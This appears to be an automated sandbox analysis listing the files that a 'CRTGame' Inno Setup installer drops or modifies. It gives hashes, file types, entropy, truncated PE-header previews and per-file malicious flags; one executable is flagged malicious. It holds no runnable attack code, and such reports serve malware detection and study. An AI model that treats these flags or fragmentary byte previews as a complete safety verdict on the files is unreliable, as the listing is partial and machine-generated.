                                                                                          Encrypted:false
                                                                                          SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                          MD5:B162992412E08888456AE13BA8BD3D90
                                                                                          SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                          SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                          SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):240654
                                                                                          Entropy (8bit):6.518503846592995
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                          MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                          SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                          SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                          SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):852754
                                                                                          Entropy (8bit):6.503318968423685
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                                          MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                                          SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                                          SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                                          SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):315918
                                                                                          Entropy (8bit):6.5736483262229735
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                                          MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                                          SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                                          SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                                          SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):112640
                                                                                          Entropy (8bit):6.540227486061059
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                          MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                          SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                          SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                          SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                          Malicious:false
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):772608
                                                                                          Entropy (8bit):6.546391052615969
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                          MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                          SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                          SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                          SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                          Malicious:false
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):294926
                                                                                          Entropy (8bit):6.191604766067493
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                          MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                          SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                          SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                          SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):13838
                                                                                          Entropy (8bit):5.173769974589746
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                          MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                          SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                          SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                          SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):258560
                                                                                          Entropy (8bit):6.491223412910377
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                          MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                          SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                          SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                          SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:modified
                                                                                          Size (bytes):2199540
                                                                                          Entropy (8bit):6.34382356471681
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                                          MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                                          SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                                          SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                                          SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                                          Malicious:true
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2199540
                                                                                          Entropy (8bit):6.343823195460407
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:EWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:zt0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                                          MD5:EB732B105CEAE8D6D08B309621C239F5
                                                                                          SHA1:B673ABD9B9A11193DE071C3C98B372A0EEFD2C50
                                                                                          SHA-256:839DC7452F0E0FD9328B4A19800F630B29AFFDF7D7F30A93E3F19364CB30A1ED
                                                                                          SHA-512:F8BC354CA40CC6F47535E60D66B1907A711D28DC3C5822CFD1F461C6173D171358B8BD0FCC912A0AB74CA4046313703D451167544F79A7C182221CF5FEFD4691
                                                                                          Malicious:false
                                                                                          Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:IFF data
                                                                                          Category:dropped
                                                                                          Size (bytes):1716
                                                                                          Entropy (8bit):4.781797138644031
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                          MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                          SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                          SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                          SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                          Malicious:false
                                                                                          Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:IFF data
                                                                                          Category:dropped
                                                                                          Size (bytes):1716
                                                                                          Entropy (8bit):4.781797138644031
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                          MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                          SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                          SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                          SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                          Malicious:false
                                                                                          Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1825
                                                                                          Entropy (8bit):5.088030483893024
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                          MD5:992C00BEAB194CE392117BB419F53051
                                                                                          SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                          SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                          SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                          Malicious:false
                                                                                          Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1825
                                                                                          Entropy (8bit):5.088030483893024
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                          MD5:992C00BEAB194CE392117BB419F53051
                                                                                          SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                          SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                          SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                          Malicious:false
                                                                                          Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:IFF data
                                                                                          Category:dropped
                                                                                          Size (bytes):1716
                                                                                          Entropy (8bit):4.781797138644031
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                          MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                          SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                          SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                          SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                          Malicious:false
                                                                                          Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1825
                                                                                          Entropy (8bit):5.088030483893024
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                          MD5:992C00BEAB194CE392117BB419F53051
                                                                                          SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                          SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                          SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                          Malicious:false
                                                                                          Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):714526
                                                                                          Entropy (8bit):6.5053900039496435
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                          MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                          SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                          SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                          SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                          Malicious:false
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:InnoSetup Log CRTGame, version 0x30, 8021 bytes, 226533\user, "C:\Program Files (x86)\CRTGame"
                                                                                          Category:dropped
                                                                                          Size (bytes):8021
                                                                                          Entropy (8bit):5.055151263516062
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:D3N8WVPpbbK+T4hlOIhlXWx4cVSQs0Ln9+7E2VYW4uT:D98WVPp1+QIhs+cVSQ1nIFmA
                                                                                          MD5:4E3566AEA6C511E6B0E1E1B41FACDC42
                                                                                          SHA1:83135A0B77D318EA0AD4512D86B457CDB8FFB80C
                                                                                          SHA-256:2610C20F92393138C606FC5D0CDAA4D3789131F0BF8AE4F22553810D8562C5EB
                                                                                          SHA-512:15B2136FD1EA5A756720A7AE9366D9EC24C2D45CA3CA31E8A7E7BEA7F09EB4474C7CB8F76567270D45905D43303A2099266F247D0D4ED82803F057000C461D04
                                                                                          Malicious:false
                                                                                          Preview:Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...U...%................................................................................................................Q.>.........{8.......?....226533.user.C:\Program Files (x86)\CRTGame.................. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemMet
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):714526
                                                                                          Entropy (8bit):6.5053900039496435
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                          MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                          SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                          SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                          SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                          Malicious:false
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2199540
                                                                                          Entropy (8bit):6.34382356471681
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                                          MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                                          SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
